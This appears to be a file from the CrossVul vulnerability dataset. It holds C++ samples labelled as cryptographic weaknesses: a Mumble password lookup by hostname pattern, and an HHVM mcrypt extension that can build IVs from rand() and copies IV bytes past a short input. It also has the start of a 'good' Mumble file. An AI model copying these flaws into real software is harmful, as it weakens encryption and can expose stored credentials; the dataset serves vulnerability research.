bool Database::fuzzyMatch(QString &name, QString &user, QString &pw, QString &hostname, unsigned short port) {
QSqlQuery query;
if (! user.isEmpty()) {
query.prepare(QLatin1String("SELECT `username`, `password`, `hostname`, `name` FROM `servers` WHERE `username` LIKE ? AND `hostname` LIKE ? AND `port`=?"));
query.addBindValue(user);
} else {
query.prepare(QLatin1String("SELECT `username`, `password`, `hostname`, `name` FROM `servers` WHERE `hostname` LIKE ? AND `port`=?"));
}
query.addBindValue(hostname);
query.addBindValue(port);
query.exec();
if (query.next()) {
user = query.value(0).toString();
if (pw.isEmpty())
pw = query.value(1).toString();
hostname = query.value(2).toString();
if (name.isEmpty())
name = query.value(3).toString();
return true;
} else {
return false;
}
}
| ./CrossVul/dataset_final_sorted/CWE-310/cpp/bad_3579_0 |
crossvul-cpp_data_bad_2259_0 | /*
+----------------------------------------------------------------------+
| HipHop for PHP |
+----------------------------------------------------------------------+
| Copyright (c) 2010-2014 Facebook, Inc. (http://www.facebook.com) |
| Copyright (c) 1997-2010 The PHP Group |
+----------------------------------------------------------------------+
| This source file is subject to version 3.01 of the PHP license, |
| that is bundled with this package in the file LICENSE, and is |
| available through the world-wide-web at the following url: |
| http://www.php.net/license/3_01.txt |
| If you did not receive a copy of the PHP license and are unable to |
| obtain it through the world-wide-web, please send a note to |
| license@php.net so we can mail you a copy immediately. |
+----------------------------------------------------------------------+
*/
#include "hphp/runtime/base/base-includes.h"
#include "hphp/runtime/base/runtime-error.h"
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#define NON_FREE
#define MCRYPT2
#include <mcrypt.h>
namespace HPHP {
///////////////////////////////////////////////////////////////////////////////
class MCrypt : public SweepableResourceData {
public:
explicit MCrypt(MCRYPT td) : m_td(td), m_init(false) {
}
~MCrypt() {
MCrypt::close();
}
void sweep() FOLLY_OVERRIDE {
close();
}
void close() {
if (m_td != MCRYPT_FAILED) {
mcrypt_generic_deinit(m_td);
mcrypt_module_close(m_td);
m_td = MCRYPT_FAILED;
}
}
CLASSNAME_IS("mcrypt");
// overriding ResourceData
virtual const String& o_getClassNameHook() const { return classnameof(); }
MCRYPT m_td;
bool m_init;
};
typedef enum {
RANDOM = 0,
URANDOM,
RAND
} iv_source;
class mcrypt_data {
public:
std::string algorithms_dir;
std::string modes_dir;
};
static mcrypt_data s_globals;
#define MCG(n) (s_globals.n)
#ifndef MIN
#define MIN(a, b) ((a) < (b) ? (a) : (b))
#endif
#define MCRYPT_OPEN_MODULE_FAILED(str) \
raise_warning("%s(): Module initialization failed", str);
static Variant php_mcrypt_do_crypt(const String& cipher, const String& key,
const String& data, const String& mode,
const String& iv, bool dencrypt,
char *name) {
MCRYPT td = mcrypt_module_open((char*)cipher.data(),
(char*)MCG(algorithms_dir).data(),
(char*)mode.data(),
(char*)MCG(modes_dir).data());
if (td == MCRYPT_FAILED) {
MCRYPT_OPEN_MODULE_FAILED(name);
return false;
}
/* Checking for key-length */
int max_key_length = mcrypt_enc_get_key_size(td);
if (key.size() > max_key_length) {
raise_warning("Size of key is too large for this algorithm");
}
int count;
int *key_length_sizes = mcrypt_enc_get_supported_key_sizes(td, &count);
int use_key_length;
char *key_s = nullptr;
if (count == 0 && key_length_sizes == nullptr) { // all lengths 1 - k_l_s = OK
use_key_length = key.size();
key_s = (char*)malloc(use_key_length);
memcpy(key_s, key.data(), use_key_length);
} else if (count == 1) { /* only m_k_l = OK */
key_s = (char*)malloc(key_length_sizes[0]);
memset(key_s, 0, key_length_sizes[0]);
memcpy(key_s, key.data(), MIN(key.size(), key_length_sizes[0]));
use_key_length = key_length_sizes[0];
} else { /* dertermine smallest supported key > length of requested key */
use_key_length = max_key_length; /* start with max key length */
for (int i = 0; i < count; i++) {
if (key_length_sizes[i] >= key.size() &&
key_length_sizes[i] < use_key_length) {
use_key_length = key_length_sizes[i];
}
}
key_s = (char*)malloc(use_key_length);
memset(key_s, 0, use_key_length);
memcpy(key_s, key.data(), MIN(key.size(), use_key_length));
}
mcrypt_free(key_length_sizes);
/* Check IV */
char *iv_s = nullptr;
int iv_size = mcrypt_enc_get_iv_size(td);
/* IV is required */
if (mcrypt_enc_mode_has_iv(td) == 1) {
if (!iv.empty()) {
if (iv_size != iv.size()) {
raise_warning("%s(): The IV parameter must be as long as "
"the blocksize", name);
} else {
iv_s = (char*)malloc(iv_size + 1);
memcpy(iv_s, iv.data(), iv_size);
}
} else {
raise_warning("%s(): The IV parameter must be as long as "
"the blocksize", name);
iv_s = (char*)malloc(iv_size + 1);
memset(iv_s, 0, iv_size + 1);
}
}
int block_size;
unsigned long int data_size;
String s;
char *data_s;
/* Check blocksize */
if (mcrypt_enc_is_block_mode(td) == 1) { /* It's a block algorithm */
block_size = mcrypt_enc_get_block_size(td);
data_size = (((data.size() - 1) / block_size) + 1) * block_size;
s = String(data_size, ReserveString);
data_s = (char*)s.bufferSlice().ptr;
memset(data_s, 0, data_size);
memcpy(data_s, data.data(), data.size());
} else { /* It's not a block algorithm */
data_size = data.size();
s = String(data_size, ReserveString);
data_s = (char*)s.bufferSlice().ptr;
memcpy(data_s, data.data(), data.size());
}
if (mcrypt_generic_init(td, key_s, use_key_length, iv_s) < 0) {
raise_warning("Mcrypt initialisation failed");
return false;
}
if (dencrypt) {
mdecrypt_generic(td, data_s, data_size);
} else {
mcrypt_generic(td, data_s, data_size);
}
/* freeing vars */
mcrypt_generic_end(td);
if (key_s != nullptr) {
free(key_s);
}
if (iv_s != nullptr) {
free(iv_s);
}
s.setSize(data_size);
return s;
}
static Variant mcrypt_generic(const Resource& td, const String& data,
bool dencrypt) {
MCrypt *pm = td.getTyped<MCrypt>();
if (!pm->m_init) {
raise_warning("Operation disallowed prior to mcrypt_generic_init().");
return false;
}
if (data.empty()) {
raise_warning("An empty string was passed");
return false;
}
String s;
unsigned char* data_s;
int block_size, data_size;
/* Check blocksize */
if (mcrypt_enc_is_block_mode(pm->m_td) == 1) { /* It's a block algorithm */
block_size = mcrypt_enc_get_block_size(pm->m_td);
data_size = (((data.size() - 1) / block_size) + 1) * block_size;
s = String(data_size, ReserveString);
data_s = (unsigned char *)s.bufferSlice().ptr;
memset(data_s, 0, data_size);
memcpy(data_s, data.data(), data.size());
} else { /* It's not a block algorithm */
data_size = data.size();
s = String(data_size, ReserveString);
data_s = (unsigned char *)s.bufferSlice().ptr;
memcpy(data_s, data.data(), data.size());
}
if (dencrypt) {
mdecrypt_generic(pm->m_td, data_s, data_size);
} else {
mcrypt_generic(pm->m_td, data_s, data_size);
}
s.setSize(data_size);
return s;
}
///////////////////////////////////////////////////////////////////////////////
Variant HHVM_FUNCTION(mcrypt_module_open, const String& algorithm,
const String& algorithm_directory,
const String& mode, const String& mode_directory) {
MCRYPT td = mcrypt_module_open
((char*)algorithm.data(),
(char*)(algorithm_directory.empty() ? MCG(algorithms_dir).data() :
algorithm_directory.data()),
(char*)mode.data(),
(char*)(mode_directory.empty() ? (char*)MCG(modes_dir).data() :
mode_directory.data()));
if (td == MCRYPT_FAILED) {
raise_warning("Could not open encryption module");
return false;
}
return Resource(new MCrypt(td));
}
bool HHVM_FUNCTION(mcrypt_module_close, const Resource& td) {
td.getTyped<MCrypt>()->close();
return true;
}
Array HHVM_FUNCTION(mcrypt_list_algorithms,
const String& lib_dir /* = null_string */) {
String dir = lib_dir.empty() ? String(MCG(algorithms_dir)) : lib_dir;
int count = 0;
char **modules = mcrypt_list_algorithms((char*)dir.data(), &count);
if (count == 0) {
raise_warning("No algorithms found in module dir");
}
Array ret = Array::Create();
for (int i = 0; i < count; i++) {
ret.append(String(modules[i], CopyString));
}
mcrypt_free_p(modules, count);
return ret;
}
Array HHVM_FUNCTION(mcrypt_list_modes,
const String& lib_dir /* = null_string */) {
String dir = lib_dir.empty() ? String(MCG(modes_dir)) : lib_dir;
int count = 0;
char **modules = mcrypt_list_modes((char*)dir.data(), &count);
if (count == 0) {
raise_warning("No modes found in module dir");
}
Array ret = Array::Create();
for (int i = 0; i < count; i++) {
ret.append(String(modules[i], CopyString));
}
mcrypt_free_p(modules, count);
return ret;
}
int64_t HHVM_FUNCTION(mcrypt_module_get_algo_block_size,
const String& algorithm,
const String& lib_dir /* = null_string */) {
String dir = lib_dir.empty() ? String(MCG(algorithms_dir)) : lib_dir;
return mcrypt_module_get_algo_block_size((char*)algorithm.data(),
(char*)dir.data());
}
int64_t HHVM_FUNCTION(mcrypt_module_get_algo_key_size, const String& algorithm,
const String& lib_dir /* = null_string */) {
String dir = lib_dir.empty() ? String(MCG(algorithms_dir)) : lib_dir;
return mcrypt_module_get_algo_key_size((char*)algorithm.data(),
(char*)dir.data());
}
Array HHVM_FUNCTION(mcrypt_module_get_supported_key_sizes,
const String& algorithm,
const String& lib_dir /* = null_string */) {
String dir = lib_dir.empty() ? String(MCG(algorithms_dir)) : lib_dir;
int count = 0;
int *key_sizes = mcrypt_module_get_algo_supported_key_sizes
((char*)algorithm.data(), (char*)dir.data(), &count);
Array ret = Array::Create();
for (int i = 0; i < count; i++) {
ret.append(key_sizes[i]);
}
mcrypt_free(key_sizes);
return ret;
}
bool HHVM_FUNCTION(mcrypt_module_is_block_algorithm_mode, const String& mode,
const String& lib_dir /* = null_string */) {
String dir = lib_dir.empty() ? String(MCG(modes_dir)) : lib_dir;
return mcrypt_module_is_block_algorithm_mode((char*)mode.data(),
(char*)dir.data()) == 1;
}
bool HHVM_FUNCTION(mcrypt_module_is_block_algorithm, const String& algorithm,
const String& lib_dir /* = null_string */) {
String dir = lib_dir.empty() ? String(MCG(algorithms_dir)) : lib_dir;
return mcrypt_module_is_block_algorithm((char*)algorithm.data(),
(char*)dir.data()) == 1;
}
bool HHVM_FUNCTION(mcrypt_module_is_block_mode, const String& mode,
const String& lib_dir /* = null_string */) {
String dir = lib_dir.empty() ? String(MCG(modes_dir)) : lib_dir;
return mcrypt_module_is_block_mode((char*)mode.data(),
(char*)dir.data()) == 1;
}
bool HHVM_FUNCTION(mcrypt_module_self_test, const String& algorithm,
const String& lib_dir /* = null_string */) {
String dir = lib_dir.empty() ? String(MCG(algorithms_dir)) : lib_dir;
return mcrypt_module_self_test((char*)algorithm.data(),
(char*)dir.data()) == 0;
}
Variant HHVM_FUNCTION(mcrypt_create_iv, int size, int source /* = 0 */) {
if (size <= 0 || size >= INT_MAX) {
raise_warning("Can not create an IV with a size of less than 1 or "
"greater than %d", INT_MAX);
return false;
}
int n = 0;
char *iv = (char*)calloc(size + 1, 1);
if (source == RANDOM || source == URANDOM) {
int fd = open(source == RANDOM ? "/dev/random" : "/dev/urandom", O_RDONLY);
if (fd < 0) {
free(iv);
raise_warning("Cannot open source device");
return false;
}
int read_bytes;
for (read_bytes = 0; read_bytes < size && n >= 0; read_bytes += n) {
n = read(fd, iv + read_bytes, size - read_bytes);
}
n = read_bytes;
close(fd);
if (n < size) {
free(iv);
raise_warning("Could not gather sufficient random data");
return false;
}
} else {
n = size;
while (size) {
iv[--size] = (char)(255.0 * rand() / RAND_MAX);
}
}
return String(iv, n, AttachString);
}
Variant HHVM_FUNCTION(mcrypt_encrypt, const String& cipher, const String& key,
const String& data, const String& mode,
const Variant& viv /* = null_string */) {
String iv = viv.toString();
return php_mcrypt_do_crypt(cipher, key, data, mode, iv, false,
"mcrypt_encrypt");
}
Variant HHVM_FUNCTION(mcrypt_decrypt, const String& cipher, const String& key,
const String& data, const String& mode,
const Variant& viv /* = null_string */) {
String iv = viv.toString();
return php_mcrypt_do_crypt(cipher, key, data, mode, iv, true,
"mcrypt_decrypt");
}
Variant HHVM_FUNCTION(mcrypt_cbc, const String& cipher, const String& key,
const String& data, const Variant& mode,
const Variant& viv /* = null_string */) {
raise_deprecated("Function mcrypt_cbc() is deprecated");
String iv = viv.toString();
return php_mcrypt_do_crypt(cipher, key, data, "cbc", iv, mode.toInt32(),
"mcrypt_cbc");
}
Variant HHVM_FUNCTION(mcrypt_cfb, const String& cipher, const String& key,
const String& data, const Variant& mode,
const Variant& viv /* = null_string */) {
raise_deprecated("Function mcrypt_cfb() is deprecated");
String iv = viv.toString();
return php_mcrypt_do_crypt(cipher, key, data, "cfb", iv, mode.toInt32(),
"mcrypt_cfb");
}
Variant HHVM_FUNCTION(mcrypt_ecb, const String& cipher, const String& key,
const String& data, const Variant& mode,
const Variant& viv /* = null_string */) {
raise_deprecated("Function mcrypt_ecb() is deprecated");
String iv = viv.toString();
return php_mcrypt_do_crypt(cipher, key, data, "ecb", iv, mode.toInt32(),
"mcrypt_ecb");
}
Variant HHVM_FUNCTION(mcrypt_ofb, const String& cipher, const String& key,
const String& data, const Variant& mode,
const Variant& viv /* = null_string */) {
raise_deprecated("Function mcrypt_ofb() is deprecated");
String iv = viv.toString();
return php_mcrypt_do_crypt(cipher, key, data, "ofb", iv, mode.toInt32(),
"mcrypt_ofb");
}
Variant HHVM_FUNCTION(mcrypt_get_block_size, const String& cipher,
const Variant& module /* = null_string */) {
MCRYPT td = mcrypt_module_open((char*)cipher.data(),
(char*)MCG(algorithms_dir).data(),
(char*)module.asCStrRef().data(),
(char*)MCG(modes_dir).data());
if (td == MCRYPT_FAILED) {
MCRYPT_OPEN_MODULE_FAILED("mcrypt_get_block_size");
return false;
}
int64_t ret = mcrypt_enc_get_block_size(td);
mcrypt_module_close(td);
return ret;
}
Variant HHVM_FUNCTION(mcrypt_get_cipher_name, const String& cipher) {
MCRYPT td = mcrypt_module_open((char*)cipher.data(),
(char*)MCG(algorithms_dir).data(),
(char*)"ecb",
(char*)MCG(modes_dir).data());
if (td == MCRYPT_FAILED) {
td = mcrypt_module_open((char*)cipher.data(),
(char*)MCG(algorithms_dir).data(),
(char*)"stream",
(char*)MCG(modes_dir).data());
if (td == MCRYPT_FAILED) {
MCRYPT_OPEN_MODULE_FAILED("mcrypt_get_cipher_name");
return false;
}
}
char *cipher_name = mcrypt_enc_get_algorithms_name(td);
mcrypt_module_close(td);
String ret(cipher_name, CopyString);
mcrypt_free(cipher_name);
return ret;
}
Variant HHVM_FUNCTION(mcrypt_get_iv_size, const String& cipher,
const String& mode) {
MCRYPT td = mcrypt_module_open((char*)cipher.data(),
(char*)MCG(algorithms_dir).data(),
(char*)mode.data(),
(char*)MCG(modes_dir).data());
if (td == MCRYPT_FAILED) {
MCRYPT_OPEN_MODULE_FAILED("mcrypt_get_iv_size");
return false;
}
int64_t ret = mcrypt_enc_get_iv_size(td);
mcrypt_module_close(td);
return ret;
}
Variant HHVM_FUNCTION(mcrypt_get_key_size, const String& cipher,
const String& module) {
MCRYPT td = mcrypt_module_open((char*)cipher.data(),
(char*)MCG(algorithms_dir).data(),
(char*)module.data(),
(char*)MCG(modes_dir).data());
if (td == MCRYPT_FAILED) {
MCRYPT_OPEN_MODULE_FAILED("mcrypt_get_key_size");
return false;
}
int64_t ret = mcrypt_enc_get_key_size(td);
mcrypt_module_close(td);
return ret;
}
String HHVM_FUNCTION(mcrypt_enc_get_algorithms_name, const Resource& td) {
char *name = mcrypt_enc_get_algorithms_name(td.getTyped<MCrypt>()->m_td);
String ret(name, CopyString);
mcrypt_free(name);
return ret;
}
int64_t HHVM_FUNCTION(mcrypt_enc_get_block_size, const Resource& td) {
return mcrypt_enc_get_block_size(td.getTyped<MCrypt>()->m_td);
}
int64_t HHVM_FUNCTION(mcrypt_enc_get_iv_size, const Resource& td) {
return mcrypt_enc_get_iv_size(td.getTyped<MCrypt>()->m_td);
}
int64_t HHVM_FUNCTION(mcrypt_enc_get_key_size, const Resource& td) {
return mcrypt_enc_get_key_size(td.getTyped<MCrypt>()->m_td);
}
String HHVM_FUNCTION(mcrypt_enc_get_modes_name, const Resource& td) {
char *name = mcrypt_enc_get_modes_name(td.getTyped<MCrypt>()->m_td);
String ret(name, CopyString);
mcrypt_free(name);
return ret;
}
Array HHVM_FUNCTION(mcrypt_enc_get_supported_key_sizes, const Resource& td) {
int count = 0;
int *key_sizes =
mcrypt_enc_get_supported_key_sizes(td.getTyped<MCrypt>()->m_td, &count);
Array ret = Array::Create();
for (int i = 0; i < count; i++) {
ret.append(key_sizes[i]);
}
mcrypt_free(key_sizes);
return ret;
}
bool HHVM_FUNCTION(mcrypt_enc_is_block_algorithm_mode, const Resource& td) {
return mcrypt_enc_is_block_algorithm_mode(td.getTyped<MCrypt>()->m_td) == 1;
}
bool HHVM_FUNCTION(mcrypt_enc_is_block_algorithm, const Resource& td) {
return mcrypt_enc_is_block_algorithm(td.getTyped<MCrypt>()->m_td) == 1;
}
bool HHVM_FUNCTION(mcrypt_enc_is_block_mode, const Resource& td) {
return mcrypt_enc_is_block_mode(td.getTyped<MCrypt>()->m_td) == 1;
}
int64_t HHVM_FUNCTION(mcrypt_enc_self_test, const Resource& td) {
return mcrypt_enc_self_test(td.getTyped<MCrypt>()->m_td);
}
int64_t HHVM_FUNCTION(mcrypt_generic_init, const Resource& td,
const String& key,
const String& iv) {
MCrypt *pm = td.getTyped<MCrypt>();
int max_key_size = mcrypt_enc_get_key_size(pm->m_td);
int iv_size = mcrypt_enc_get_iv_size(pm->m_td);
if (key.empty()) {
raise_warning("Key size is 0");
}
unsigned char *key_s = (unsigned char *)malloc(key.size());
memset(key_s, 0, key.size());
unsigned char *iv_s = (unsigned char *)malloc(iv_size + 1);
memset(iv_s, 0, iv_size + 1);
int key_size;
if (key.size() > max_key_size) {
raise_warning("Key size too large; supplied length: %d, max: %d",
key.size(), max_key_size);
key_size = max_key_size;
} else {
key_size = key.size();
}
memcpy(key_s, key.data(), key.size());
if (iv.size() != iv_size) {
raise_warning("Iv size incorrect; supplied length: %d, needed: %d",
iv.size(), iv_size);
}
memcpy(iv_s, iv.data(), iv_size);
mcrypt_generic_deinit(pm->m_td);
int result = mcrypt_generic_init(pm->m_td, key_s, key_size, iv_s);
/* If this function fails, close the mcrypt module to prevent crashes
* when further functions want to access this resource */
if (result < 0) {
pm->close();
switch (result) {
case -3:
raise_warning("Key length incorrect");
break;
case -4:
raise_warning("Memory allocation error");
break;
case -1:
default:
raise_warning("Unknown error");
break;
}
}
pm->m_init = true;
free(iv_s);
free(key_s);
return result;
}
Variant HHVM_FUNCTION(mcrypt_generic, const Resource& td, const String& data) {
return mcrypt_generic(td, data, false);
}
Variant HHVM_FUNCTION(mdecrypt_generic, const Resource& td,
const String& data) {
return mcrypt_generic(td, data, true);
}
bool HHVM_FUNCTION(mcrypt_generic_deinit, const Resource& td) {
MCrypt *pm = td.getTyped<MCrypt>();
if (mcrypt_generic_deinit(pm->m_td) < 0) {
raise_warning("Could not terminate encryption specifier");
return false;
}
pm->m_init = false;
return true;
}
bool HHVM_FUNCTION(mcrypt_generic_end, const Resource& td) {
return HHVM_FUNCTION(mcrypt_generic_deinit, td);
}
///////////////////////////////////////////////////////////////////////////////
const StaticString s_MCRYPT_3DES("MCRYPT_3DES");
const StaticString s_MCRYPT_ARCFOUR("MCRYPT_ARCFOUR");
const StaticString s_MCRYPT_ARCFOUR_IV("MCRYPT_ARCFOUR_IV");
const StaticString s_MCRYPT_BLOWFISH("MCRYPT_BLOWFISH");
const StaticString s_MCRYPT_BLOWFISH_COMPAT("MCRYPT_BLOWFISH_COMPAT");
const StaticString s_MCRYPT_CAST_128("MCRYPT_CAST_128");
const StaticString s_MCRYPT_CAST_256("MCRYPT_CAST_256");
const StaticString s_MCRYPT_CRYPT("MCRYPT_CRYPT");
const StaticString s_MCRYPT_DECRYPT("MCRYPT_DECRYPT");
const StaticString s_MCRYPT_DES("MCRYPT_DES");
const StaticString s_MCRYPT_DEV_RANDOM("MCRYPT_DEV_RANDOM");
const StaticString s_MCRYPT_DEV_URANDOM("MCRYPT_DEV_URANDOM");
const StaticString s_MCRYPT_ENCRYPT("MCRYPT_ENCRYPT");
const StaticString s_MCRYPT_ENIGNA("MCRYPT_ENIGNA");
const StaticString s_MCRYPT_GOST("MCRYPT_GOST");
const StaticString s_MCRYPT_IDEA("MCRYPT_IDEA");
const StaticString s_MCRYPT_LOKI97("MCRYPT_LOKI97");
const StaticString s_MCRYPT_MARS("MCRYPT_MARS");
const StaticString s_MCRYPT_MODE_CBC("MCRYPT_MODE_CBC");
const StaticString s_MCRYPT_MODE_CFB("MCRYPT_MODE_CFB");
const StaticString s_MCRYPT_MODE_ECB("MCRYPT_MODE_ECB");
const StaticString s_MCRYPT_MODE_NOFB("MCRYPT_MODE_NOFB");
const StaticString s_MCRYPT_MODE_OFB("MCRYPT_MODE_OFB");
const StaticString s_MCRYPT_MODE_STREAM("MCRYPT_MODE_STREAM");
const StaticString s_MCRYPT_PANAMA("MCRYPT_PANAMA");
const StaticString s_MCRYPT_RAND("MCRYPT_RAND");
const StaticString s_MCRYPT_RC2("MCRYPT_RC2");
const StaticString s_MCRYPT_RC6("MCRYPT_RC6");
const StaticString s_MCRYPT_RIJNDAEL_128("MCRYPT_RIJNDAEL_128");
const StaticString s_MCRYPT_RIJNDAEL_192("MCRYPT_RIJNDAEL_192");
const StaticString s_MCRYPT_RIJNDAEL_256("MCRYPT_RIJNDAEL_256");
const StaticString s_MCRYPT_SAFER128("MCRYPT_SAFER128");
const StaticString s_MCRYPT_SAFER64("MCRYPT_SAFER64");
const StaticString s_MCRYPT_SAFERPLUS("MCRYPT_SAFERPLUS");
const StaticString s_MCRYPT_SERPENT("MCRYPT_SERPENT");
const StaticString s_MCRYPT_SKIPJACK("MCRYPT_SKIPJACK");
const StaticString s_MCRYPT_THREEWAY("MCRYPT_THREEWAY");
const StaticString s_MCRYPT_TRIPLEDES("MCRYPT_TRIPLEDES");
const StaticString s_MCRYPT_TWOFISH("MCRYPT_TWOFISH");
const StaticString s_MCRYPT_WAKE("MCRYPT_WAKE");
const StaticString s_MCRYPT_XTEA("MCRYPT_XTEA");
class McryptExtension : public Extension {
public:
McryptExtension() : Extension("mcrypt") {}
virtual void moduleInit() {
Native::registerConstant<KindOfStaticString>(
s_MCRYPT_3DES.get(), StaticString("tripledes").get()
);
Native::registerConstant<KindOfStaticString>(
s_MCRYPT_ARCFOUR.get(), StaticString("arcfour").get()
);
Native::registerConstant<KindOfStaticString>(
s_MCRYPT_ARCFOUR_IV.get(), StaticString("arcfour-iv").get()
);
Native::registerConstant<KindOfStaticString>(
s_MCRYPT_BLOWFISH.get(), StaticString("blowfish").get()
);
Native::registerConstant<KindOfStaticString>(
s_MCRYPT_BLOWFISH_COMPAT.get(), StaticString("blowfish-compat").get()
);
Native::registerConstant<KindOfStaticString>(
s_MCRYPT_CAST_128.get(), StaticString("cast-128").get()
);
Native::registerConstant<KindOfStaticString>(
s_MCRYPT_CAST_256.get(), StaticString("cast-256").get()
);
Native::registerConstant<KindOfStaticString>(
s_MCRYPT_CRYPT.get(), StaticString("crypt").get()
);
Native::registerConstant<KindOfInt64>(
s_MCRYPT_DECRYPT.get(), 1
);
Native::registerConstant<KindOfStaticString>(
s_MCRYPT_DES.get(), StaticString("des").get()
);
Native::registerConstant<KindOfInt64>(
s_MCRYPT_DEV_RANDOM.get(), RANDOM
);
Native::registerConstant<KindOfInt64>(
s_MCRYPT_DEV_URANDOM.get(), URANDOM
);
Native::registerConstant<KindOfInt64>(
s_MCRYPT_ENCRYPT.get(), 0
);
Native::registerConstant<KindOfStaticString>(
s_MCRYPT_ENIGNA.get(), StaticString("crypt").get()
);
Native::registerConstant<KindOfStaticString>(
s_MCRYPT_GOST.get(), StaticString("gost").get()
);
Native::registerConstant<KindOfStaticString>(
s_MCRYPT_IDEA.get(), StaticString("idea").get()
);
Native::registerConstant<KindOfStaticString>(
s_MCRYPT_LOKI97.get(), StaticString("loki97").get()
);
Native::registerConstant<KindOfStaticString>(
s_MCRYPT_MARS.get(), StaticString("mars").get()
);
Native::registerConstant<KindOfStaticString>(
s_MCRYPT_MODE_CBC.get(), StaticString("cbc").get()
);
Native::registerConstant<KindOfStaticString>(
s_MCRYPT_MODE_CFB.get(), StaticString("cfb").get()
);
Native::registerConstant<KindOfStaticString>(
s_MCRYPT_MODE_ECB.get(), StaticString("ecb").get()
);
Native::registerConstant<KindOfStaticString>(
s_MCRYPT_MODE_NOFB.get(), StaticString("nofb").get()
);
Native::registerConstant<KindOfStaticString>(
s_MCRYPT_MODE_OFB.get(), StaticString("ofb").get()
);
Native::registerConstant<KindOfStaticString>(
s_MCRYPT_MODE_STREAM.get(), StaticString("stream").get()
);
Native::registerConstant<KindOfStaticString>(
s_MCRYPT_PANAMA.get(), StaticString("panama").get()
);
Native::registerConstant<KindOfInt64>(
s_MCRYPT_RAND.get(), RAND
);
Native::registerConstant<KindOfStaticString>(
s_MCRYPT_RC2.get(), StaticString("rc2").get()
);
Native::registerConstant<KindOfStaticString>(
s_MCRYPT_RC6.get(), StaticString("rc6").get()
);
Native::registerConstant<KindOfStaticString>(
s_MCRYPT_RIJNDAEL_128.get(), StaticString("rijndael-128").get()
);
Native::registerConstant<KindOfStaticString>(
s_MCRYPT_RIJNDAEL_192.get(), StaticString("rijndael-192").get()
);
Native::registerConstant<KindOfStaticString>(
s_MCRYPT_RIJNDAEL_256.get(), StaticString("rijndael-256").get()
);
Native::registerConstant<KindOfStaticString>(
s_MCRYPT_SAFER128.get(), StaticString("safer-sk128").get()
);
Native::registerConstant<KindOfStaticString>(
s_MCRYPT_SAFER64.get(), StaticString("safer-sk64").get()
);
Native::registerConstant<KindOfStaticString>(
s_MCRYPT_SAFERPLUS.get(), StaticString("saferplus").get()
);
Native::registerConstant<KindOfStaticString>(
s_MCRYPT_SERPENT.get(), StaticString("serpent").get()
);
Native::registerConstant<KindOfStaticString>(
s_MCRYPT_SKIPJACK.get(), StaticString("skipjack").get()
);
Native::registerConstant<KindOfStaticString>(
s_MCRYPT_THREEWAY.get(), StaticString("threeway").get()
);
Native::registerConstant<KindOfStaticString>(
s_MCRYPT_TRIPLEDES.get(), StaticString("tripledes").get()
);
Native::registerConstant<KindOfStaticString>(
s_MCRYPT_TWOFISH.get(), StaticString("twofish").get()
);
Native::registerConstant<KindOfStaticString>(
s_MCRYPT_WAKE.get(), StaticString("wake").get()
);
Native::registerConstant<KindOfStaticString>(
s_MCRYPT_XTEA.get(), StaticString("xtea").get()
);
HHVM_FE(mcrypt_module_open);
HHVM_FE(mcrypt_module_close);
HHVM_FE(mcrypt_list_algorithms);
HHVM_FE(mcrypt_list_modes);
HHVM_FE(mcrypt_module_get_algo_block_size);
HHVM_FE(mcrypt_module_get_algo_key_size);
HHVM_FE(mcrypt_module_get_supported_key_sizes);
HHVM_FE(mcrypt_module_is_block_algorithm_mode);
HHVM_FE(mcrypt_module_is_block_algorithm);
HHVM_FE(mcrypt_module_is_block_mode);
HHVM_FE(mcrypt_module_self_test);
HHVM_FE(mcrypt_create_iv);
HHVM_FE(mcrypt_encrypt);
HHVM_FE(mcrypt_decrypt);
HHVM_FE(mcrypt_cbc);
HHVM_FE(mcrypt_cfb);
HHVM_FE(mcrypt_ecb);
HHVM_FE(mcrypt_ofb);
HHVM_FE(mcrypt_get_block_size);
HHVM_FE(mcrypt_get_cipher_name);
HHVM_FE(mcrypt_get_iv_size);
HHVM_FE(mcrypt_get_key_size);
HHVM_FE(mcrypt_enc_get_algorithms_name);
HHVM_FE(mcrypt_enc_get_block_size);
HHVM_FE(mcrypt_enc_get_iv_size);
HHVM_FE(mcrypt_enc_get_key_size);
HHVM_FE(mcrypt_enc_get_modes_name);
HHVM_FE(mcrypt_enc_get_supported_key_sizes);
HHVM_FE(mcrypt_enc_is_block_algorithm_mode);
HHVM_FE(mcrypt_enc_is_block_algorithm);
HHVM_FE(mcrypt_enc_is_block_mode);
HHVM_FE(mcrypt_enc_self_test);
HHVM_FE(mcrypt_generic_init);
HHVM_FE(mcrypt_generic);
HHVM_FE(mdecrypt_generic);
HHVM_FE(mcrypt_generic_deinit);
HHVM_FE(mcrypt_generic_end);
loadSystemlib();
}
} s_mcrypt_extension;
///////////////////////////////////////////////////////////////////////////////
}
| ./CrossVul/dataset_final_sorted/CWE-310/cpp/bad_2259_0 |
crossvul-cpp_data_good_3579_1 | /* Copyright (C) 2005-2011, Thorvald Natvig <thorvald@natvig.com>
Copyright (C) 2009-2011, Stefan Hacker <dd0t@users.sourceforge.net>
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions
are met:
- Redistributions of source code must retain the above copyright notice,
this list of conditions and the following disclaimer.
- Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following disclaimer in the documentation
and/or other materials provided with the distribution.
- Neither the name of the Mumble Developers nor the names of its
contributors may be used to endorse or promote products derived from this
software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
``AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE FOUNDATION OR
CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
*/
#include "Settings.h"
#include "Log.h"
#include "Global.h"
#include "AudioInput.h"
#include "Cert.h"
#include "../../overlay/overlay.h"
#include "../../overlay/overlay_blacklist.h"
bool Shortcut::isServerSpecific() const {
